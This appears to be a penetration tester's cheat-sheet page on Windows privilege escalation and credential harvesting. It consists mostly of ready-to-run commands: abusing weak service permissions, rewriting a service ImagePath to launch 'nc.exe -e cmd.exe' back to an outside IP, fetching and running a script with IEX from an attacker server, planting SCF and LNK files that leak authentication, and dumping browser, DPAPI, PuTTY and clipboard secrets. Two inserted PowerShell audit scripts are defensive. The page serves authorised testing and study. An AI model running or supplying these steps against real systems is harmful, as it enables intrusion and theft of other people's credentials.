Windows

Last updated 26 days ago

Enumeration

Tools: WinPEAS, Metasploit, PrivescCheck, SharpUp (.\SharpUp.exe audit).

PrivescCheck:

powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck"
# or load the script into the current session, then run Invoke-PrivescCheck
Get-Content .\PrivescCheck.ps1 | Out-String | IEX

Functionality

Shows how to exploit vulnerabilities in known programs to perform privileged actions.

Groups and Privileges

Display the token privileges, possibly from a privileged shell; privileges that are present but disabled can be activated with EnableAllTokenPrivs.ps1.

whoami /priv
.\EnableAllTokenPrivs.ps1

Groups and privileges worth checking:
  • SeImpersonate & SeAssignPrimaryToken
  • SeDebug
  • SeTakeOwnership
  • SeBackupPrivilege (Backup Operators)
  • Event Log Readers
  • DnsAdmins
  • Print Operators
  • Server Operators
  • Hyper-V Administrators

User Account Control (UAC)

A feature that shows a consent prompt for elevated activities. When UAC is enabled, applications and tasks always run in the security context of a non-administrator account unless an administrator explicitly authorizes them to run with administrator-level access to the system. UAC works with integrity levels ranging from low to high; check the integrity level of the current process.

Check whether UAC is enabled and how the administrator prompt behaves.

REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA
REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v ConsentPromptBehaviorAdmin

ConsentPromptBehaviorAdmin values:
0 = Elevate without prompting
1 = Prompt for credentials on the secure desktop
2 = Prompt for consent on the secure desktop
3 = Prompt for credentials
4 = Prompt for consent
5 = Prompt for consent for non-Windows binaries (default)

UACMe

Compile UACMe with Visual Studio to obtain akagi.exe.

Check the OS version and note the build number.

[environment]::OSVersion.Version

Look up the method key for that build number in the UACMe GitHub README, then run it.

akagi.exe [Key] [Param]

Misconfigurations & Weak Permissions

Tools:
  • SharpUp: .\SharpUp.exe audit
  • PowerUp (from PowerSploit or Empire): powershell -ep bypass, then . .\PowerUp.ps1

Modifiable Service Binaries (weak ACLs)

.\SharpUp.exe audit
# === Modifiable Service Binaries ===

Using icacls we can verify the finding and see whether we have full permissions on the binary's directory.

icacls "<PathName>"

At this point we can replace the service binary with a malicious binary generated with msfvenom.

cmd /c copy /Y "<MaliciousExe>" "<PathName>"

Restart the service.

sc.exe stop <NameService>
sc.exe start <NameService>
sc.exe query <NameService> # check the service state afterwards
# or
net stop <NameService>
net start <NameService>
# or (PowerShell)
Restart-Service <NameService>

Modifiable Services

.\SharpUp.exe audit
# === Modifiable Service ===

Next, use AccessChk from the Sysinternals suite to enumerate the permissions on the service (or use PowerUp from PowerSploit or Empire).

accesschk.exe /accepteula -quvcw <NameService>

We can use our permissions on the service to change its binary path maliciously.

sc.exe config <NameService> binPath= "cmd /c <COMMAND>"

Restart the service.

sc.exe stop <NameService>
sc.exe start <NameService>
sc.exe query <NameService> # check the service state afterwards
# or
net stop <NameService>
net start <NameService>
# or (PowerShell)
Restart-Service <NameService>
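The following audit is an added example, not code from the original page or from SharpUp/AccessChk: it parses the SDDL that sc.exe sdshow prints for every service and reports the Allow ACEs that give ordinary users (Everyone, Authenticated Users, BUILTIN\Users, INTERACTIVE) the rights that make a service reconfigurable, which is what the section above abuses. The SID list, rights list and function names are my own choices.

```powershell
# Added example (not from the original page): parse the SDDL printed by
# "sc.exe sdshow" for each service and flag DACL entries that let low-privileged
# principals reconfigure the service or rewrite its security descriptor.
# Assumes Windows with sc.exe available; the SID and rights lists are my own choice.

# SDDL SID aliases and raw SIDs for "any user": Everyone, Authenticated Users,
# BUILTIN\Users and INTERACTIVE.
$LowPrivSids = @('WD', 'AU', 'BU', 'IU', 'S-1-1-0', 'S-1-5-11', 'S-1-5-32-545', 'S-1-5-4')

# Service rights that allow takeover: DC = SERVICE_CHANGE_CONFIG (binPath= rewrite),
# WD = WRITE_DAC, WO = WRITE_OWNER, SD = DELETE, GA/GW = generic all/write.
$DangerousTokens = @('DC', 'WD', 'WO', 'SD', 'GA', 'GW')
$DangerousMask   = 0x2 -bor 0x10000 -bor 0x40000 -bor 0x80000 -bor 0x10000000 -bor 0x40000000

function Test-DangerousRights {
    param([Parameter(Mandatory)][string]$Rights)
    if ($Rights -match '^0x[0-9a-fA-F]+$') {          # rights given as a numeric access mask
        return (([int64]$Rights -band $DangerousMask) -ne 0)
    }
    # Otherwise a run of two-letter tokens, e.g. CCLCSWRPWPDTLOCRRC.
    foreach ($m in [regex]::Matches($Rights, '..')) {
        if ($DangerousTokens -contains $m.Value) { return $true }
    }
    return $false
}

function Get-WeakServiceDacl {
    param([string[]]$Name = (Get-Service | Select-Object -ExpandProperty Name))
    # ACE layout: (type;flags;rights;object_guid;inherit_guid;sid)
    $acePattern = '\((?<type>[^;]*);[^;]*;(?<rights>[^;]*);[^;]*;[^;]*;(?<sid>[^)]*)\)'
    foreach ($svc in $Name) {
        $sddl = (& sc.exe sdshow $svc 2>$null | Where-Object { $_ -match '^D:' }) -join ''
        if (-not $sddl) { continue }   # access denied or no such service
        # Keep the DACL only; the SACL (S:...) controls auditing, not access.
        $dacl = ($sddl -split 'S:')[0]
        foreach ($m in [regex]::Matches($dacl, $acePattern)) {
            if ($m.Groups['type'].Value -ne 'A') { continue }   # only Allow ACEs grant rights
            $sid = $m.Groups['sid'].Value
            if ($LowPrivSids -notcontains $sid) { continue }
            if (-not (Test-DangerousRights -Rights $m.Groups['rights'].Value)) { continue }
            [pscustomobject]@{ Service = $svc; Principal = $sid; Rights = $m.Groups['rights'].Value }
        }
    }
}

# Anything listed here is what "accesschk -w" would report as writable by ordinary users.
Get-WeakServiceDacl | Format-Table -AutoSize
```

Each reported service should have its DACL tightened (for example with sc.exe sdset) so that only administrators and SYSTEM hold DC, WD, WO or SD.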

Unquoted Service Paths

If the path of a service's binary contains one or more spaces and is not enclosed in quotes, Windows can interpret it in several ways: it reads the path from left to right and, at each space, first tries the prefix up to that point with .exe appended. So if we can place a binary in one of those intermediate locations and restart the service, our binary is executed instead of the real one. Although it is not uncommon to find applications with unquoted service paths, it is rarely exploitable, because the intermediate directories are usually not writable by a normal user.

We can identify unquoted service binary paths using

wmic service get name,displayname,pathname,startmode |findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """
wmic service get name,pathname | findstr /i /v "C:\Windows\\" | findstr /i /v """
. .\PowerUp.ps1
Get-UnquotedService
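As an added example that is not part of the original page (and not PowerUp's own code), this PowerShell audit goes one step beyond the wmic and Get-UnquotedService listings above: for every unquoted ImagePath with spaces it enumerates the intermediate paths Windows would probe and checks whether the current account can create files in their parent directories, so only the genuinely risky services are reported. The function names and the ACL-based write test are my own.

```powershell
# Added example (not from the original page): audit every service for an unquoted
# ImagePath containing spaces, list the intermediate paths Windows would try first,
# and flag those whose parent directory the current user can create files in.
# Assumes Windows with PowerShell 5.1+; the write test below is an ACL approximation.

function Test-DirectoryWritable {
    param([Parameter(Mandatory)][string]$Path)
    if (-not (Test-Path -LiteralPath $Path -PathType Container)) { return $false }
    $id   = [System.Security.Principal.WindowsIdentity]::GetCurrent()
    $sids = @($id.User.Value) + @($id.Groups | ForEach-Object { $_.Value })
    # CreateFiles (WriteData) is the bit needed to drop a new file; Write, Modify and
    # FullControl all include it. Generic rights in the ACL are not expanded here.
    $bit   = [int][System.Security.AccessControl.FileSystemRights]::CreateFiles
    $allow = $false
    $deny  = $false
    foreach ($rule in (Get-Acl -LiteralPath $Path).Access) {
        try   { $sid = $rule.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value }
        catch { continue }   # unresolvable or orphaned identity: ignore
        if ($sids -notcontains $sid) { continue }
        if (([int]$rule.FileSystemRights -band $bit) -eq 0) { continue }
        if ($rule.AccessControlType -eq 'Deny') { $deny = $true } else { $allow = $true }
    }
    return ($allow -and -not $deny)
}

function Get-UnquotedServicePathRisk {
    $root = 'HKLM:\SYSTEM\CurrentControlSet\Services'
    foreach ($key in Get-ChildItem -Path $root -ErrorAction SilentlyContinue) {
        $image = [string](Get-ItemProperty -Path $key.PSPath -ErrorAction SilentlyContinue).ImagePath
        if (-not $image -or $image.TrimStart().StartsWith('"')) { continue }   # quoted: unambiguous
        # Keep only the executable part: everything up to and including ".exe".
        $end = $image.IndexOf('.exe', [System.StringComparison]::OrdinalIgnoreCase)
        if ($end -lt 0) { continue }
        $binary = $image.Substring(0, $end + 4).Trim()
        # No spaces means no ambiguity; the OS directory is excluded like in the page's filters.
        if ($binary -notmatch ' ' -or $binary -like "$env:SystemRoot\*") { continue }
        $parts = $binary -split ' '
        # Windows probes "C:\Program.exe", then "C:\Program Files\My.exe", ... before the real path.
        for ($i = 1; $i -lt $parts.Count; $i++) {
            $candidate = ($parts[0..($i - 1)] -join ' ') + '.exe'
            $dir = Split-Path -Path $candidate -Parent
            $writable = if ($dir) { Test-DirectoryWritable -Path $dir } else { $false }
            [pscustomobject]@{
                Service     = $key.PSChildName
                ImagePath   = $image
                Candidate   = $candidate
                WritableDir = $writable
            }
        }
    }
}

# Only the entries where this account could actually plant a file need remediation:
# quote the ImagePath or fix the directory ACL.
Get-UnquotedServicePathRisk | Where-Object { $_.WritableDir } | Format-Table -AutoSize
```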

Permissive Registry ACLs

It is also worth searching for weak service ACLs in the Windows registry, with AccessChk from the Sysinternals suite.

accesschk.exe /accepteula "<USER>" -kvuqsw hklm\System\CurrentControlSet\services

# RW HKLM\System\CurrentControlSet\services\ModelManagerService
#        KEY_ALL_ACCESS

We can abuse this by rewriting the service's ImagePath and then starting the service.

Set-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\ModelManagerService -Name "ImagePath" -Value "C:\Users\john\Downloads\nc.exe -e cmd.exe 10.10.10.205 443"
# start service

Modifiable Registry Autorun Binary

We can use WMIC (or Get-CimInstance) to see which programs run at system startup. If we have write permissions to the registry for a given binary, or can overwrite a listed binary, we may be able to escalate privileges to another user the next time that user logs in.

Get-CimInstance Win32_StartupCommand | select Name, command, Location, User | fl

File

Search for sensitive information in different files

dir /s *<STRING>* 

unattend.xml

dir /s *unattend.xml*
dir /s *autounattend.xml*

Application Configuration Files

Look for readable configuration files in which passwords can be saved.

findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml
findstr /si password *.xml *.ini *.txt *.config
findstr /spin "password" *.*
cd c:\Users\<USER>\Documents & findstr /SI /M "password" *.xml *.ini *.txt
select-string -Path C:\Users\<USER>\Documents\*.txt -Pattern password
dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*
where /R C:\ *.config
Get-ChildItem C:\ -Recurse -Include *.rdp, *.config, *.vnc, *.cred -ErrorAction Ignore

Dictionary Files

The user can add words to their dictionary to avoid the distracting red underline, including passwords.

gc 'C:\Users\<USER>\AppData\Local\Google\Chrome\User Data\Default\Custom Dictionary.txt' | Select-String <STRING>

PowerShell Credentials

Administrators often need to create automated scripts for users that also contain credentials. The credentials are encrypted and protected via DPAPI, which typically means they can only be decrypted by the same user on the same computer they were created on.

Example script

# Connect-VC.ps1
# Get-Credential | Export-Clixml -Path 'C:\scripts\pass.xml'
$encryptedPassword = Import-Clixml -Path 'C:\scripts\pass.xml'
$decryptedPassword = $encryptedPassword.GetNetworkCredential().Password
Connect-VIServer -Server 'VC-01' -User 'bob_adm' -Password $decryptedPassword

If we have gained command execution in the context of this user, we can recover the cleartext credentials.

$credential = Import-Clixml -Path 'C:\scripts\pass.xml'
$credential.GetNetworkCredential().username
$credential.GetNetworkCredential().password

StickyNotes

Notes are stored in a SQLite database. Copy it to your system and open it with DB Browser for SQLite, or query it on the target with PSSQLite.

C:\Users\<USER>\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite
Import-Module .\PSSQLite.psd1
$db = 'C:\Users\<USER>\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite'
Invoke-SqliteQuery -Database $db -Query "SELECT Text FROM Note" | ft -wrap

Password Managers

KeePass, 1Password, Thycotic, CyberArk, etc.

dir /s *.kdbx*
keepass2john <FILE.kdbx>

Crack the resulting hash with hashcat (mode 13400).

VHDX & VMDK

dir /S /B *.vhd == *.vhdx == *.vmdk
Get-ChildItem -Path C:\ -Recurse -Include *.vhd, *.vhdx, *.vmdk -ErrorAction SilentlyContinue

Mount the image read-only and extract the SYSTEM, SAM and SECURITY hives from it.

guestmount --add <FILE>.vhdx  --ro /mnt/vhdx/ [-m /dev/sda1]
guestmount -a <FILE>.vmdk -i --ro /mnt/vmdk

Shares SMB

With netexec (nxc) search for interesting files among the shares (try again if there are errors).

nxc smb <IP> -u <USER> -p <PASS> --spider '<SHARE>' --regex '<REGEX>'
nxc smb <IP> -u <USER> -p <PASS> -M spider_plus

Password

Search for passwords saved on the system.

Tools:

  • LaZagne: searches for saved passwords.

laZagne.exe all

  • SessionGopher: extracts saved PuTTY, WinSCP, FileZilla, SuperPuTTY and RDP credentials.

Import-Module .\SessionGopher.ps1
Invoke-SessionGopher -Target <MACHINE, e.g. WINLPE-SRV01>

  • Snaffler: searches for passwords and interesting files.

.\snaffler.exe -s -o snaffler.log [-i]
.\snaffler.exe -s -d <domain> -o snaffler.log [-i]

Browser

Tools:

  • SharpChrome: retrieve cookies and saved logins from Google Chrome.

.\SharpChrome.exe logins /unprotect

  • SharpChromium: retrieve Chromium data such as cookies, history and saved logins.

  • Invoke-SharpChromium: PowerShell script that uses reflection to load SharpChromium. If there is a path error, copy the cookie file that contains the database to the location SharpChromium expects.

Import-Module .\Invoke-SharpChromium.ps1
Invoke-SharpChromium -Command "cookies <SITE>"

  • cookieextractor: extract cookies from the Firefox cookies.sqlite database. Copy and transfer the database with the cookies to the attacking machine.

copy $env:APPDATA\Mozilla\Firefox\Profiles\*.default-release\cookies.sqlite .

Archived Passwords

cmdkey /list
# take note of user

Connect via the RDP GUI, or run a command with runas using the saved credential.

runas /savecred /user:<DOMAIN>\<USER> "<COMMAND>"

Autorun

Windows Autologon allows a system to log on to a specific user account automatically, without requiring manual input of the username and password at each startup. The username and password are stored in the registry in clear text. Autologon.exe from the Sysinternals suite instead encrypts the password and stores it as an LSA secret.

reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

Putty

For Putty sessions utilizing a proxy connection, when the session is saved, the credentials are stored in the registry in clear text.

reg query "HKEY_CURRENT_USER\SOFTWARE\SimonTatham\PuTTY\Sessions"
# take note of sessions
reg query "HKEY_CURRENT_USER\SOFTWARE\SimonTatham\PuTTY\Sessions\<NAME_SESSION>"

If we had admin privileges, we could also find the sessions under the corresponding user's hive in HKEY_USERS.

DPAPI

The DPAPI (Data Protection API) is an internal component of Windows. It allows applications to store sensitive data (e.g. passwords). The data is stored in the user's profile directory and is protected by user-specific master keys derived from the user's password.

# MASTER KEYS (ENCRYPTED)
ls -Hidden C:\Users\<USER>\AppData\Roaming\Microsoft\Protect\
ls -Hidden C:\Users\<USER>\AppData\Local\Microsoft\Protect\
# PROTECTED FILES (CREDENTIAL BLOBS)
ls -Hidden C:\Users\<USER>\AppData\Roaming\Microsoft\Credentials\
ls -Hidden C:\Users\<USER>\AppData\Local\Microsoft\Credentials\

Get-Content <FILE>

IMPORTANT: transfer the files from Windows without corrupting them (e.g. base64-encode them first).

Tools:

  • impacket-dpapi. Extract the master key:

dpapi masterkey -file <MASTERKEY> -sid "<SID>" -password '<USER_PASS>'

Extract the protected data with the master key:

dpapi credential -f <PROTECTED_FILE> -key <MASTERKEY>

  • Mimikatz. Extract the master key:

dpapi::masterkey /in:"C:\Users\<USER>\AppData\Roaming\Microsoft\Protect\<SID>\<GUID>" /sid:<SID> /password:<PASS> /protected /rpc

Extract the protected data with the master key:

dpapi::cred /in:<PROTECTED_FILE> /masterkey:<MASTERKEY>

Other tools: DonPAPI, dpapick and dpapilab. See also secretsdump.py.

Various

Variables

Check environment variables for sensitive information such as passwords or misconfiguration.

set 
Get-ChildItem Env: | ft key,value

History

Administrators often clean the history only with Clear-History, but this is not enough: it only clears what Get-History shows, while the full history is still saved by PSReadLine.

Get-History
(Get-PSReadLineOption).HistorySavePath
gc (Get-PSReadLineOption).HistorySavePath
# default location:
# C:\Users\<USER>\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
foreach($user in ((ls C:\users).fullname)){cat "$user\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt" -ErrorAction SilentlyContinue}

Scheduled Tasks

Get-ScheduledTask
schtasks /query /fo LIST /v
# Task To Run

Unfortunately, we cannot list scheduled tasks created by other users (such as admins) because they are stored in C:\Windows\System32\Tasks. Instead, look for files that could be the target of an administrator's scheduled task.

DLL Injection

  • LoadLibrary
  • Manual Mapping
  • Reflective DLL Injection

See also the DLL Hijacking page.

Vulnerable Service & Applications

Some services/applications may allow us to escalate to SYSTEM. Enumerate the installed applications carefully and check whether they contain known vulnerabilities.

  • Druva inSync 6.6.3: CVE-2020-5752 (use with a reverse shell such as Invoke-PowerShellTcp.ps1).
  • mRemoteNG: used to manage and connect to remote systems using VNC, RDP, SSH and similar protocols. Saved connections are stored in %USERPROFILE%\APPDATA\Roaming\mRemoteNG\confCons.xml (take the password from the <NODE> element) and can be decrypted with mRemoteNG-Decrypt:

mremoteng_decrypt.py -s "<PASSWORD>"
mremoteng_decrypt.py -s "<PASSWORD>" -p <MasterPass>
# if a master password is set, try brute-forcing it with a wordlist and a foreach loop

Always Install Elevated

Query both hives (append /v AlwaysInstallElevated to show only that value); the setting must be 1 in both.

reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer

Create an MSI payload with msfvenom and run it on the target.

msiexec /i myExploit.msi /quiet /qn /norestart

Or use Write-UserAddMSI from PowerUp (PowerSploit or Empire).

Import-Module .\PowerUp.ps1
Write-UserAddMSI
.\UserAdd.msi

Citrix Breakout

It is possible to use Windows dialog boxes (features like Save, Save As, Open, Load, Browse, Import, Export, Help, Search, Scan, Print, etc.) as a means to bypass the restrictions imposed on users when browsing directories.

In the File Name field, with the file type set to All Files, enter a path such as:

\\127.0.0.1\c$\<PATH>
\\<MY_IP>\share

The second one is served with smbserver from the attacker machine.

Because of the restrictions within File Explorer, copying files directly is not viable. An alternative is to right-click an executable and run it, where the executable opens a terminal, such as the following program:

#include <stdlib.h>

/* Spawns a command prompt when run from the dialog. */
int main(void) {
  system("C:\\Windows\\System32\\cmd.exe");
  return 0;
}

Alternatively, right-click a shortcut > Properties > Target > C:\Windows\System32\cmd.exe, i.e. modify an existing shortcut (also possible with a .lnk file).

Alternative file system editors such as Q-Dir or Explorer++ can be employed as a workaround. Similarly, when the default Registry Editor is blocked by group policy, alternative registry editors can be used to bypass the standard group policy restrictions; Simpleregedit, Uberregedit and SmallRegistryEditor are examples of such GUI tools.

When script extensions such as .bat, .vbs or .ps1 are configured to execute automatically with their respective interpreters, it becomes possible to drop a script that serves as an interactive console.

New file "evil.bat" > insert "cmd" > save it > run it

Email

Search through email in a Microsoft Exchange environment for specific terms with MailSniper.

Clipboard

Steal the clipboard contents with Invoke-Clipboard.

Import-Module .\Invoke-Clipboard.ps1
Invoke-ClipboardLogger

Backup Program

restic: the password used for the backup is saved in $env:RESTIC_PASSWORD; if it is not present, it is requested each time.

# initialise the backup repository
restic.exe -r E:\restic init
# back up a folder; --use-fs-snapshot creates a Volume Shadow Copy for files in use
restic.exe -r E:\restic\ backup C:\FolderToBackup --use-fs-snapshot
# list snapshots and restore one
restic.exe -r E:\restic\ snapshots
restic.exe -r E:\restic\ restore <ID> --target C:\RestoreHere

Interacting with Users

Passive Traffic

Tools:
  • PCredz: captures sensitive information from live network traffic, or from a pcap taken with tcpdump.
  • net-creds: sniffs sensitive data from an interface or pcap.

Monitoring for Process Command Lines

When we get a shell as a user, there may be scheduled tasks or other processes being executed that pass credentials on the command line. This script captures process command lines every two seconds and compares the current state with the previous state, outputting any differences.

# procmon.ps1
while($true)
{
  $process = Get-WmiObject Win32_Process | Select-Object CommandLine
  Start-Sleep 1
  $process2 = Get-WmiObject Win32_Process | Select-Object CommandLine
  Compare-Object -ReferenceObject $process -DifferenceObject $process2
}

Load and run it from the attacker's web server:

IEX (iwr 'http://<MY_IP>:<MY_PORT>/procmon.ps1')

SCF

If there are public folders that are also accessed by other users and that we have write permissions to, we can insert an .scf file that is executed every time the folder containing it is opened. Using SCFs no longer works on Server 2019 hosts.

<NAME>.scf
[Shell]
Command=2
IconFile=\\<MY_IP>\share\legit.ico
[Taskbar]
Command=ToggleDesktop
sudo responder -I <INTERFACE>

LNK

We can get the same effect as with an SCF using a malicious .lnk file. Tools such as Lnkbomb can generate one, or we can run this code:

$objShell = New-Object -ComObject WScript.Shell
$lnk = $objShell.CreateShortcut("C:\<PATH>\<NAME>.lnk")
$lnk.TargetPath = "\\<attackerIP>\@pwn.png"
$lnk.WindowStyle = 1
$lnk.IconLocation = "%windir%\system32\shell32.dll, 3"
$lnk.Description = "Browsing to the directory where this file is saved will trigger an auth request."
$lnk.HotKey = "Ctrl+Alt+O"
$lnk.Save()

Kernel

Kernel-level exploits depend on the kernel version and operating system and may crash the machine.

systeminfo
wmic qfe list brief
Get-Hotfix

Examine the installed updates and look up the KB (Microsoft Knowledge Base ID number) in the Microsoft Update Catalog. See also the Windows CVE section.

Tools:

  • Sherlock: PowerShell script to quickly find missing software patches.

Import-Module .\Sherlock.ps1
Find-AllVulns

  • Watson: enumerates missing KBs and suggests exploits.

  • wesng: Windows Exploit Suggester (next generation).

  • Windows-Exploit-Suggester: Python script to detect potentially missing patches. Save the systeminfo output from the target Windows system, then:

python2.7 windows-exploit-suggester.py --update
python2.7 windows-exploit-suggester.py --database <DB.xlsx> --systeminfo <SYSTEMINFO.txt>
